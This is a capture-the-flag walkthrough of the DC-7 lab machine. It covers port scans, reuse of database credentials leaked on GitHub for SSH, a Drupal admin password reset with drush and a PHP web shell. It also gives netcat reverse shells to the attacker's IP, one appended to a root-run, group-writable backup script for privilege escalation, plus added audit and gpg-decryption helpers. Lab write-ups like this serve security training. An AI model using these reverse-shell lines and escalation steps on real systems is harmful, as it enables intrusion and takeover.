
DCchallenges7

## Information gathering

### Environment

- Subnet: 192.168.18.0/24
- Kali: 192.168.18.131
- Target: 192.168.18.140

### Scanning the subnet

```
kali@kali2020:~$ sudo nmap 192.168.18.0/24 -p- -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-07 14:16 CST
Nmap scan report for 192.168.18.2
Host is up (0.00045s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
53/tcp open  domain  dnsmasq 2.78
MAC Address: 00:50:56:E0:DA:9A (VMware)

Nmap scan report for 192.168.18.140
Host is up (0.00055s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:7C:A6:2A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.18.254
Host is up (0.00025s latency).
All 65535 scanned ports on 192.168.18.254 are filtered
MAC Address: 00:50:56:E1:37:77 (VMware)

Nmap scan report for 192.168.18.131
Host is up (0.0000030s latency).
All 65535 scanned ports on 192.168.18.131 are closed

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 64.63 seconds
```

### Scanning the target

```
kali@kali2020:~$ sudo nmap 192.168.18.140 -p- -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-07 21:11 CST
Nmap scan report for 192.168.18.140
Host is up (0.0017s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:7C:A6:2A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds
```

Only SSH and HTTP are exposed, so the web application is the way in.

### Directory scan with dirsearch

http://192.168.18.140/user/login


The home page shows the site runs Drupal; DC-1 used it as well.

### Following the hints

Welcome to DC-7

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box. :-)


I never worked out what "outside the box" was meant to point at, so I checked other people's write-ups: the bottom left of the home page credits @DC7USER, and that Twitter account links to a GitHub profile, https://github.com/Dc7User, which holds a repository called staffdb. Start with its config.php:

```php
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
```

## SSH login

That gives a database username and password. They do not log in to the website.

Check whether the same credentials work for SSH: the lesson of this box is password reuse, not a Drupal bug.

dc7user / MdR3xOgB7#dW logs in successfully.

```
dc7user@dc-7:~$ sudo -l
-bash: sudo: command not found
You have new mail in /var/mail/dc7user
dc7user@dc-7:~$ cat /var/mail/dc7user
```

The mail is much the same as the mbox file below.


```
dc7user@dc-7:~$ ls
backups  mbox
dc7user@dc-7:~$ cat mbox
```

Three backup-related files turn up in the messages:

- Database dump: /home/dc7user/backups/website.sql
- Shell script: /opt/scripts/backups.sh
- Website archive: /home/dc7user/backups/website.tar.gz


```
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
dc7user@dc-7:~$ ls -l /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29  2019 /opt/scripts/backups.sh
```

Two things stand out. The script is owned by root but its group is www-data and it is group-writable (mode 775), so the web server user can change a script that root runs on a schedule (the mail in the mailbox is that job's output, and the root shell at the end of this write-up comes from it). And the gpg passphrase, PickYourOwnPassword, is sitting in the clear in a file dc7user can read.
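The escalation lives in that mode string, so it is worth having a check that reads it the way a reviewer would: who, other than the owner, can write a file that root executes. The helper below is an added example, not part of the original write-up or of the DC-7 image. mode_writers takes the symbolic mode, owner and group as printed by `ls -l` or `stat -c '%A %U %G'` and names every non-owner writer; scan_dir applies it to a directory tree and assumes GNU stat, as on the Debian target (the sample line is the one from the box).

```shell
#!/bin/sh
# Added example: audit which principals besides the owner can modify a file.
# Not from the walkthrough or the DC-7 image; assumes GNU stat for scan_dir.

# mode_writers MODE OWNER GROUP
#   MODE is the 10-character symbolic mode from `ls -l` / `stat -c %A`.
#   Prints "group=<GROUP>", "other", both joined by a comma, or "none".
#   OWNER is accepted so the arguments mirror `stat -c '%A %U %G'` output.
mode_writers() {
  mode=$1
  group=$3
  gw=$(printf '%s' "$mode" | cut -c6)   # group write bit is the 6th character
  ow=$(printf '%s' "$mode" | cut -c9)   # other write bit is the 9th character
  out=""
  [ "$gw" = "w" ] && out="group=$group"
  [ "$ow" = "w" ] && out="${out:+$out,}other"
  printf '%s\n' "${out:-none}"
}

# scan_dir DIR
#   Lists every regular file under DIR that someone other than its owner can
#   write, one per line: "<path> <mode> <owner> writable by <who>".
#   Run it over /opt, /etc/cron* and anything a root cron job references.
scan_dir() {
  find "$1" -type f -exec stat -c '%A %U %G %n' {} + 2>/dev/null |
  while read -r mode owner group path; do
    who=$(mode_writers "$mode" "$owner" "$group")
    [ "$who" = none ] || printf '%s %s %s writable by %s\n' "$path" "$mode" "$owner" "$who"
  done
}

# The line from the box: root owns the script, www-data can rewrite it.
mode_writers -rwxrwxr-x root www-data   # prints: group=www-data
```

Anything the function reports as writable by www-data is reachable from a web shell, which is exactly the path taken later in this write-up; dc7user, not being root and not shown to be in www-data, cannot edit the file directly.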

The bash script uses the drush and gpg commands; look up how each is used.
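Because the passphrase is hard-coded, the "encrypted" backups protect nothing from anyone who can read /opt/scripts/backups.sh, and website.sql is a full drush sql-dump, Drupal account password hashes included. The helpers below are an added example, not commands from the write-up; they assume GnuPG 2.1 or later (the script's own --pinentry-mode flag needs the same) and that the encrypted files are named website.sql.gpg and website.tar.gz.gpg, which is what gpg --symmetric produces by default for those inputs.

```shell
#!/bin/sh
# Added example: recover the backups that /opt/scripts/backups.sh encrypts,
# using the passphrase the script itself leaks. Assumes GnuPG 2.1+.

# passphrase_from_script SCRIPT
#   Prints the literal that follows the first --passphrase in SCRIPT.
passphrase_from_script() {
  sed -n 's/.*--passphrase[ =]\([^ ]*\).*/\1/p' "$1" | head -n 1
}

# decrypt_backup FILE.gpg PASSPHRASE OUTFILE
#   Symmetric decrypt with no TTY prompt, mirroring the flags the script used.
decrypt_backup() {
  gpg --batch --yes --quiet --pinentry-mode loopback \
      --passphrase "$2" --output "$3" --decrypt "$1"
}

# encrypt_like_script FILE PASSPHRASE
#   Reproduces the script's gpg call, writing FILE.gpg next to FILE
#   (used to round-trip a constructed sample without touching the target).
encrypt_like_script() {
  gpg --batch --yes --quiet --pinentry-mode loopback \
      --passphrase "$2" --symmetric "$1"
}

# Usage on the box (paths from the walkthrough):
#   pw=$(passphrase_from_script /opt/scripts/backups.sh)
#   decrypt_backup /home/dc7user/backups/website.sql.gpg "$pw" /tmp/website.sql
#   grep -i 'INSERT INTO' /tmp/website.sql | head
```

Decrypting is the quiet route to the admin password hash; the write-up instead resets the password with drush, which is louder but does not depend on cracking anything.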

So both gpg and drush are installed on the box.

### Changing the admin password with drush

drush can change a user's password. Drush is the command-line shell and Unix scripting interface for Drupal; Drush Core ships with many useful commands for working with code such as modules, themes and profiles.

```
dc7user@dc-7:~$ drush user-password admin --password="123"
Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to run this command.  [error]
The drush command 'user-password admin' could not be executed.  [error]
dc7user@dc-7:~$
```

It fails because drush has to bootstrap the Drupal site, and it locates the site from the current directory. Run it from /var/www/html instead:

```
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123"
Changed password for admin  [success]
dc7user@dc-7:/var/www/html$
```

The password change succeeds; try logging in at http://192.168.18.140/user/login.

admin / 123 logs in.

### Reverse shell

Now find a way to get a reverse shell: see whether a one-line PHP web shell can be planted and connected to.

When creating new content there is no PHP text format on offer.

Check the Extend page to see whether a PHP module can simply be enabled; it is not there, so it has to be installed manually (other write-ups cover this).

Download the PHP filter module:

https://www.drupal.org/project/php

The installer says the accepted archive formats are zip, tar, tgz, gz and bz2.

Download the tar.gz, save it locally, then upload it through the installer.

Installation succeeds.

Write a page containing phpinfo() first to confirm that PHP code executes.

Then write the one-line web shell

and connect to it with AntSword.


Reverse shell with nc:

```
kali@kali2020:~$ nc -nlvp 8888
```

From the AntSword terminal:

```
nc -c /bin/sh 192.168.18.131 8888
```

This needs a netcat build that can run a command (Debian's netcat-traditional supports -c/-e; the OpenBSD nc does not).

Upgrade to an interactive shell:

```
python -c 'import pty;pty.spawn("/bin/bash")'
```

## Privilege escalation

The shell runs as www-data, the group that can write /opt/scripts/backups.sh. Start a listener on Kali (nc -nlvp 7777), then append a reverse-shell line to the script:

```
echo "nc -e /bin/bash 192.168.18.131 7777" >> /opt/scripts/backups.sh
```

A root shell comes back, but only once the scheduled job next runs, so expect to wait a while.

Note: the reverse shell could have gone straight into the PHP one-liner instead of a separate web shell:

```php
<?php system('nc -e /bin/sh 192.168.18.131 9999'); ?>
```
